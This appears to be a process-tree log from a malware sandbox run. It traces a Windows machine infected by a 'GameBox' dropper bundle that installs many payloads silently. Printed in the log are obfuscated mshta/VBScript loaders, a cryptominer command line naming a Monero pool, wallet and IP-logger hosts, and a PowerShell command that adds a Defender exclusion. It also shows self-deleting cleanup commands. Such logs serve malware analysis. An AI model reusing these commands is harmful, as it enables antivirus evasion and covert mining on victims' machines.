C:\Program Files\Uninstall Information\IBUGQFVAQG\ultramediaburner.exe"C:\Program Files\Uninstall Information\IBUGQFVAQG\ultramediaburner.exe" /VERYSILENT6⤵
C:\Users\Admin\AppData\Local\Temp\is-G1SMF.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-G1SMF.tmp\ultramediaburner.tmp" /SL5="$20656,281924,62464,C:\Program Files\Uninstall Information\IBUGQFVAQG\ultramediaburner.exe" /VERYSILENT7⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu8⤵
C:\Users\Admin\AppData\Local\Temp\5b-43086-d4b-c22b8-fce0920750d49\SHilapajigae.exe"C:\Users\Admin\AppData\Local\Temp\5b-43086-d4b-c22b8-fce0920750d49\SHilapajigae.exe"6⤵
- Checks computer location settings
C:\Users\Admin\AppData\Local\Temp\3f-79b60-b68-1b894-b78c8cd4fb1fd\Gyherohyno.exe"C:\Users\Admin\AppData\Local\Temp\3f-79b60-b68-1b894-b78c8cd4fb1fd\Gyherohyno.exe"6⤵
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tzjfftdw.git\GcleanerEU.exe /eufive & exit7⤵
C:\Users\Admin\AppData\Local\Temp\tzjfftdw.git\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\tzjfftdw.git\GcleanerEU.exe /eufive8⤵
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3wzw5sav.qjr\installer.exe /qn CAMPAIGN="654" & exit7⤵
C:\Users\Admin\AppData\Local\Temp\3wzw5sav.qjr\installer.exeC:\Users\Admin\AppData\Local\Temp\3wzw5sav.qjr\installer.exe /qn CAMPAIGN="654"8⤵
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hlyg1knd.2iq\ufgaa.exe & exit7⤵
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3owxowl4.lno\anyname.exe & exit7⤵
C:\Users\Admin\AppData\Local\Temp\3owxowl4.lno\anyname.exeC:\Users\Admin\AppData\Local\Temp\3owxowl4.lno\anyname.exe8⤵
C:\Users\Admin\AppData\Local\Temp\3owxowl4.lno\anyname.exe"C:\Users\Admin\AppData\Local\Temp\3owxowl4.lno\anyname.exe" -q9⤵
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j0sk0hr4.v04\gcleaner.exe /mixfive & exit7⤵
C:\Users\Admin\AppData\Local\Temp\j0sk0hr4.v04\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\j0sk0hr4.v04\gcleaner.exe /mixfive8⤵
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w45m2l25.oyg\autosubplayer.exe /S & exit7⤵
- Suspicious use of SetWindowsHookEx
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent3⤵
C:\Users\Admin\AppData\Local\Temp\is-9JQJN.tmp\WEATHER Manager.tmp"C:\Users\Admin\AppData\Local\Temp\is-9JQJN.tmp\WEATHER Manager.tmp" /SL5="$1032A,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
C:\Users\Admin\AppData\Local\Temp\is-4DA2O.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-4DA2O.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=7155⤵
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-4DA2O.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-4DA2O.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629548201 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"6⤵
C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe"C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent3⤵
- Executes dropped EXE
C:\Users\Admin\AppData\Local\Temp\is-G08L3.tmp\Stats.tmp"C:\Users\Admin\AppData\Local\Temp\is-G08L3.tmp\Stats.tmp" /SL5="$20310,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
C:\Users\Admin\AppData\Local\Temp\is-IDKM4.tmp\builder.exe"C:\Users\Admin\AppData\Local\Temp\is-IDKM4.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'5⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent3⤵
C:\Users\Admin\AppData\Local\Temp\is-RJG0B.tmp\VPN.tmp"C:\Users\Admin\AppData\Local\Temp\is-RJG0B.tmp\VPN.tmp" /SL5="$4027A,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent4⤵
C:\Users\Admin\AppData\Local\Temp\is-CB84U.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-CB84U.tmp\Setup.exe" /silent /subid=7205⤵
C:\Users\Admin\AppData\Local\Temp\is-RQ3PP.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-RQ3PP.tmp\Setup.tmp" /SL5="$30270,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-CB84U.tmp\Setup.exe" /silent /subid=7206⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "7⤵
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09018⤵
- Checks SCSI registry key(s)
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "7⤵
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09018⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"3⤵
- Executes dropped EXE
C:\Users\Admin\AppData\Roaming\4752940.exe"C:\Users\Admin\AppData\Roaming\4752940.exe"4⤵
C:\Users\Admin\AppData\Roaming\5398377.exe"C:\Users\Admin\AppData\Roaming\5398377.exe"4⤵
- Adds Run key to start application
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"5⤵
C:\Users\Admin\AppData\Roaming\8242401.exe"C:\Users\Admin\AppData\Roaming\8242401.exe"4⤵
C:\Users\Admin\AppData\Roaming\1524948.exe"C:\Users\Admin\AppData\Roaming\1524948.exe"4⤵
C:\Users\Admin\AppData\Roaming\7239412.exe"C:\Users\Admin\AppData\Roaming\7239412.exe"4⤵
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"4⤵
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"4⤵
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"4⤵
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
C:\Users\Admin\Documents\uQ1sY0V9BPG6y1BJhAoaX8hC.exe"C:\Users\Admin\Documents\uQ1sY0V9BPG6y1BJhAoaX8hC.exe"4⤵
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7016 -s 4805⤵
- Program crash
C:\Users\Admin\Documents\YRi2dUdNOfV42ivfdf3KhaJC.exe"C:\Users\Admin\Documents\YRi2dUdNOfV42ivfdf3KhaJC.exe"4⤵
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "YRi2dUdNOfV42ivfdf3KhaJC.exe" /f & erase "C:\Users\Admin\Documents\YRi2dUdNOfV42ivfdf3KhaJC.exe" & exit5⤵
C:\Windows\SysWOW64\taskkill.exetaskkill /im "YRi2dUdNOfV42ivfdf3KhaJC.exe" /f6⤵
- Kills process with taskkill
C:\Users\Admin\Documents\lV0cLJRjBoCNp3_nrE9Ro2WP.exe"C:\Users\Admin\Documents\lV0cLJRjBoCNp3_nrE9Ro2WP.exe"4⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
C:\Users\Admin\Documents\rRzYjitRkR6jBplorkkpKLg9.exe"C:\Users\Admin\Documents\rRzYjitRkR6jBplorkkpKLg9.exe"4⤵
- Drops file in Program Files directory
C:\Users\Admin\Documents\ZZ6GYPrzOB779rzI1ngINoXX.exe"C:\Users\Admin\Documents\ZZ6GYPrzOB779rzI1ngINoXX.exe"4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
C:\Users\Admin\Documents\Vlaiw1QOxP2xyB7onsxPGq4k.exe"C:\Users\Admin\Documents\Vlaiw1QOxP2xyB7onsxPGq4k.exe"4⤵
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 6645⤵
- Program crash
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 6765⤵
- Program crash
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 6445⤵
- Program crash
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 6765⤵
- Program crash
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 10685⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Loads dropped DLL
- Program crash
C:\Users\Admin\Documents\_5OZc4nLYgX9IT2a1zDDAjBF.exe"C:\Users\Admin\Documents\_5OZc4nLYgX9IT2a1zDDAjBF.exe"4⤵
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\Documents\_5OZc4nLYgX9IT2a1zDDAjBF.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\_5OZc4nLYgX9IT2a1zDDAjBF.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )5⤵
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\_5OZc4nLYgX9IT2a1zDDAjBF.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""=="" for %W iN ( "C:\Users\Admin\Documents\_5OZc4nLYgX9IT2a1zDDAjBF.exe") do taskkill -IM "%~nXW" -f6⤵
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Executes dropped EXE
C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXeWO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu97⤵
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )8⤵
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 "=="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe") do taskkill -IM "%~nXW" -f9⤵
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE8⤵
- Loads dropped DLL
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "_5OZc4nLYgX9IT2a1zDDAjBF.exe" -f7⤵
- Kills process with taskkill
C:\Users\Admin\Documents\8eqdhFTFfUbNhYygyZmIeg8v.exe"C:\Users\Admin\Documents\8eqdhFTFfUbNhYygyZmIeg8v.exe"4⤵
C:\Users\Admin\Documents\8eqdhFTFfUbNhYygyZmIeg8v.exe"C:\Users\Admin\Documents\8eqdhFTFfUbNhYygyZmIeg8v.exe" -q5⤵
C:\Users\Admin\Documents\4gt0OVgR76VEN6J4RzE7NZL7.exe"C:\Users\Admin\Documents\4gt0OVgR76VEN6J4RzE7NZL7.exe"4⤵
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\4GT0OV~1.DLL,s C:\Users\Admin\DOCUME~1\4GT0OV~1.EXE5⤵
- Loads dropped DLL
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\4GT0OV~1.DLL,Dw0Cdg==6⤵
- Checks processor information in registry
- Modifies system certificate store
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\4GT0OV~1.DLL7⤵
C:\Users\Admin\Documents\Dy1p0_A7yf7E__PB5TFDm6I9.exe"C:\Users\Admin\Documents\Dy1p0_A7yf7E__PB5TFDm6I9.exe"4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
C:\Users\Admin\Documents\zihUYffJhyVU5DT9YIToGAck.exe"C:\Users\Admin\Documents\zihUYffJhyVU5DT9YIToGAck.exe"4⤵
C:\Users\Admin\AppData\Local\Temp\is-O5GLM.tmp\zihUYffJhyVU5DT9YIToGAck.tmp"C:\Users\Admin\AppData\Local\Temp\is-O5GLM.tmp\zihUYffJhyVU5DT9YIToGAck.tmp" /SL5="$20560,138429,56832,C:\Users\Admin\Documents\zihUYffJhyVU5DT9YIToGAck.exe"5⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
C:\Users\Admin\AppData\Local\Temp\is-4ULHB.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-4ULHB.tmp\Setup.exe" /Verysilent6⤵
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"7⤵
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629548201 /qn CAMPAIGN=""710"" " CAMPAIGN="710"8⤵
C:\Users\Admin\Documents\Y3dp0DoOXQwgkUcZkMM1oR1J.exe"C:\Users\Admin\Documents\Y3dp0DoOXQwgkUcZkMM1oR1J.exe"4⤵
- Suspicious use of SetThreadContext
C:\Users\Admin\Documents\Y3dp0DoOXQwgkUcZkMM1oR1J.exe"C:\Users\Admin\Documents\Y3dp0DoOXQwgkUcZkMM1oR1J.exe"5⤵
C:\Users\Admin\Documents\Zpv9oGuLq0irt1z3Dy09GNLE.exe"C:\Users\Admin\Documents\Zpv9oGuLq0irt1z3Dy09GNLE.exe"4⤵
- Suspicious use of SetThreadContext
C:\Users\Admin\Documents\Zpv9oGuLq0irt1z3Dy09GNLE.exeC:\Users\Admin\Documents\Zpv9oGuLq0irt1z3Dy09GNLE.exe5⤵
C:\Users\Admin\Documents\zY9vzMCWwAKcME9k5UgICs9t.exe"C:\Users\Admin\Documents\zY9vzMCWwAKcME9k5UgICs9t.exe"4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
C:\Users\Admin\Documents\7SfXkOF4pYVqtSw1gYPu9TM6.exe"C:\Users\Admin\Documents\7SfXkOF4pYVqtSw1gYPu9TM6.exe"4⤵
- Loads dropped DLL
C:\Users\Admin\Documents\1TsU7XyCbc6_GIz5E0qEjgjc.exe"C:\Users\Admin\Documents\1TsU7XyCbc6_GIz5E0qEjgjc.exe"4⤵
C:\Users\Admin\Documents\1TsU7XyCbc6_GIz5E0qEjgjc.exeC:\Users\Admin\Documents\1TsU7XyCbc6_GIz5E0qEjgjc.exe5⤵
C:\Users\Admin\Documents\bfoV3w_l3eYtvf_suJYp6Kys.exe"C:\Users\Admin\Documents\bfoV3w_l3eYtvf_suJYp6Kys.exe"4⤵
C:\Users\Admin\AppData\Roaming\2492713.exe"C:\Users\Admin\AppData\Roaming\2492713.exe"5⤵
C:\Users\Admin\AppData\Roaming\4099138.exe"C:\Users\Admin\AppData\Roaming\4099138.exe"5⤵
C:\Users\Admin\AppData\Roaming\4684042.exe"C:\Users\Admin\AppData\Roaming\4684042.exe"5⤵
C:\Users\Admin\AppData\Roaming\1700239.exe"C:\Users\Admin\AppData\Roaming\1700239.exe"5⤵
- Suspicious behavior: SetClipboardViewer
C:\Users\Admin\Documents\2xJhqbV7AGMYVIT5Wlj8eABz.exe"C:\Users\Admin\Documents\2xJhqbV7AGMYVIT5Wlj8eABz.exe"4⤵
- Loads dropped DLL
C:\Users\Admin\Documents\gWbvKgUeUq65ebon4O0hHSuX.exe"C:\Users\Admin\Documents\gWbvKgUeUq65ebon4O0hHSuX.exe"4⤵
C:\Users\Admin\Documents\gWbvKgUeUq65ebon4O0hHSuX.exe"C:\Users\Admin\Documents\gWbvKgUeUq65ebon4O0hHSuX.exe"5⤵
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2932 -s 7686⤵
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Program crash
- Modifies registry class
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2932 -s 7646⤵
- Program crash
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2932 -s 9126⤵
- Program crash
C:\Users\Admin\Documents\neGtGmYg2E5m1bFLQTEX0TMN.exe"C:\Users\Admin\Documents\neGtGmYg2E5m1bFLQTEX0TMN.exe"4⤵
C:\Users\Admin\Documents\5whapuEleHrHkM3YY_zHWiK8.exe"C:\Users\Admin\Documents\5whapuEleHrHkM3YY_zHWiK8.exe"4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
C:\Users\Admin\Documents\wUDDLMefT4T5oMq0s2v762Em.exe"C:\Users\Admin\Documents\wUDDLMefT4T5oMq0s2v762Em.exe"4⤵
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im wUDDLMefT4T5oMq0s2v762Em.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\wUDDLMefT4T5oMq0s2v762Em.exe" & del C:\ProgramData\*.dll & exit5⤵
C:\Windows\SysWOW64\taskkill.exetaskkill /im wUDDLMefT4T5oMq0s2v762Em.exe /f6⤵
- Kills process with taskkill
C:\Windows\SysWOW64\timeout.exetimeout /t 66⤵
- Delays execution with timeout.exe
C:\Users\Admin\Documents\0cec99sYPHC4JtcYL6Dyhoy2.exe"C:\Users\Admin\Documents\0cec99sYPHC4JtcYL6Dyhoy2.exe"4⤵
C:\Users\Admin\Documents\0cec99sYPHC4JtcYL6Dyhoy2.exe"C:\Users\Admin\Documents\0cec99sYPHC4JtcYL6Dyhoy2.exe"5⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
C:\Users\Admin\Documents\rbbh_z4zXeo8LJ6ExhVxi7Dd.exe"C:\Users\Admin\Documents\rbbh_z4zXeo8LJ6ExhVxi7Dd.exe"4⤵
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"3⤵
- Executes dropped EXE
C:\Users\Admin\AppData\Local\Temp\tmp4250_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp4250_tmp.exe"4⤵
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"5⤵
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks5⤵
C:\Windows\SysWOW64\cmd.execmd6⤵
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks7⤵
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comEsplorarne.exe.com i7⤵
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i8⤵
- Suspicious use of SendNotifyMessage
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i9⤵
- Suspicious use of SendNotifyMessage
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i10⤵
- Suspicious use of SendNotifyMessage
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i11⤵
- Suspicious use of SendNotifyMessage
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i12⤵
- Suspicious use of SendNotifyMessage
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i13⤵
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i14⤵
- Suspicious use of SendNotifyMessage
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i15⤵
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i16⤵
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i17⤵
- Suspicious use of SendNotifyMessage
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i18⤵
- Suspicious use of SendNotifyMessage
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i19⤵
- Suspicious use of SendNotifyMessage
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i20⤵
- Suspicious use of SendNotifyMessage
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i21⤵
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i22⤵
- Suspicious use of SendNotifyMessage
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i23⤵
- Modifies Internet Explorer settings
- Suspicious use of SendNotifyMessage
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i24⤵
- Suspicious use of SendNotifyMessage
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i25⤵
- Suspicious use of SendNotifyMessage
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i26⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i27⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i28⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i29⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i30⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i31⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i32⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i33⤵
